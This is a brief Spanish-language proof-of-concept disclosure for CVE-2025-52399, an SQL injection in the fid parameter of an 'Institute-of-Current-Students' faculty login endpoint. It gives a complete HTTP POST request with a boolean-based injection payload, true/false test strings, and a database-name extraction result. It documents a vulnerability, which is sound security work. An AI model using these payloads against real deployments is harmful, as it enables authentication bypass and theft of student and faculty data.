
Exploit de prueba de concepto para CVE-2025-52399, que demuestra inyección SQL en el endpoint loginlinkfaculty de Institute-of-Current-Students, permitiendo omisión de autenticación y extracción de datos.
El punto final loginlinkfaculty en la aplicación Institute-of-Current-Students es vulnerable a Inyección SQL a través del parámetro POST fid. El parámetro no se sanitiza correctamente antes de ser utilizado en una consulta SQL, lo que permite a atacantes remotos ejecutar comandos SQL arbitrarios.
/loginlinkfaculty (POST)fidicsnewPOST /Institute-of-Current-Students/loginlinkfaculty HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
fid=-1'+OR+3*2*1=6+AND+000942=000942--&pass=example
✅ -1' OR 3*2*1=6 AND 000942=000942 -- → VERDADERO
❌ -1' OR 2*3=4 AND 000942=000942 -- → FALSO
SELECT database(); -- devuelve 'icsnew'
Isroil Mustafoqulov